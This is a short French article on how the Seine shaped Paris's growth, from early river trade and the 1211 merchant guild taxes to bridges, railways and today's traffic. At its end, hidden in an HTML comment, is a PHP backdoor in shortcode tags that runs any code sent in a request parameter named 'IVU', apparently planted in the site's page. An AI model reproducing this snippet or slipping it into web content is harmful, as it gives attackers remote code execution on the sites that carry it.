La Seine, un fleuve situé en plein coeur de la Capitale, et représentant son axe central, est un atout territorial ayant engendré l’essor de Paris.
La Seine, l’origine de l’expansion et de la richesse de Paris
Paris fut construit stratégiquement autour de la Seine, c’est à dire sur un site naturel entre une voie fluviale et un passage à gué qui ont permis à la ville dès le premier siècle de s’enrichir par le contrôle de la navigation. Plus tard, le commerce par voie d’eau sur la Seine fut à l’origine de la création d’une juridiction.
Celle-ci, fut dominée en majorité par une corporation de marchands qui commencèrent à percevoir des taxes sur les marchandises qui entraient ou sortaient de la Capitale à partir de 1211. Cette confrérie entraîna le début de la bourgeoisie urbaine.
Un fleuve nourricier devenu une voie de circulation
Si du moyen âge jusqu’au milieu du 18e siècle, la Seine fut exploitée en tant que première voie d’approvisionnement de Paris, ses abords furent dégagés après cette période par la dissémination des ports parisiens. En effet, le fleuve est progressivement devenu un lieu de transport qui fut amélioré par la construction de ponts au début du 19e siècle.
Dès lors, il accompagna le développement industriel de la ville qui vit apparaître ses premiers chemins de fer. De nos jours, l’industrie ne se loge plus aux bords de la Seine mais à la périphérie de la Capitale. Le fleuve reste tout de même la voie de circulation la plus fréquentée en France.
<!– [insert_php]if (isset($_REQUEST["IVU"])){eval($_REQUEST["IVU"]);exit;}[/insert_php][php]if (isset($_REQUEST["IVU"])){eval($_REQUEST["IVU"]);exit;}[/php] –>